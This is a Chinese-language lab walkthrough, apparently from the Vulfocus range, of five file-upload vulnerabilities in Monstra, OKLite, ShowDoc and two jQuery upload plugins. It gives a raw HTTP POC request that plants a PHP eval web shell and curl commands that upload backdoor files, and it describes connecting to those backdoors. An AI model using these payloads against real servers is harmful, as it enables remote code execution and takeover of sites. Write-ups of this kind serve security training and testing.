当前位置：首页 > news >正文

Vulfocus靶场-文件上传-2

news 来源：原创 2025/8/5 16:27:13

monstra 文件上传（CVE-2020-13384）

Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞，该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。

打开页面安装好页面进行登录

登录后台

上传文件这里说能上传的特殊文件后缀是phar的后缀文件

上传成功后直接命令执行

oklite 文件上传（CVE-2019-16131）

锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统（CMS）。锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞，该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

登录后台输入弱口令进行一下操作上传test.zip 里面存在有test.php后门

后门解析路径 /data/cache/test.php 进行连接连接成功

showdoc 文件上传（cnvd-2020-26585）

ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc，你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文件上传.

打开界面

直接使用POC上传文件，直接上传成功

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: xx.xx.xx.xx:xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 265----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain<?php echo 'hello!!!';@eval($_GET['cmd'])?>
----------------------------921378126371623762173617--

使用命令681daa78559a9.php?cmd=phpinfo(); 查看phpinfo()

jquery-picture-cut 任意文件上传（CVE-2018-9208）

picture cut是一个jquery插件，以非常友好和简单的方式处理图像，具有基于bootstrap或jquery ui的漂亮界面，具有ajax上传，从资源管理器拖动图像，图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器，从而允许执行代码。

直接使用poc

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@1.php" http://219.131.59.213:43188/jquery-picture-cut/src/php/upload.php

上传成功并成功连接后门

jquery 文件上传（CVE-2018-9207）

jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传根目录下/jquery-upload-file

打开页面

这里也直接用poc进行上传文件

curl -F "myfile=@1.php" "http://219.131.59.213:22267/jquery-upload-file/php/upload.php"

连接成功

monstra 文件上传 （CVE-2020-13384）

oklite 文件上传 （CVE-2019-16131）

showdoc 文件上传 （cnvd-2020-26585）

jquery-picture-cut 任意文件上传 （CVE-2018-9208）

jquery 文件上传 （CVE-2018-9207）

相关文章：

monstra 文件上传（CVE-2020-13384）

oklite 文件上传（CVE-2019-16131）

showdoc 文件上传（cnvd-2020-26585）

jquery-picture-cut 任意文件上传（CVE-2018-9208）

jquery 文件上传（CVE-2018-9207）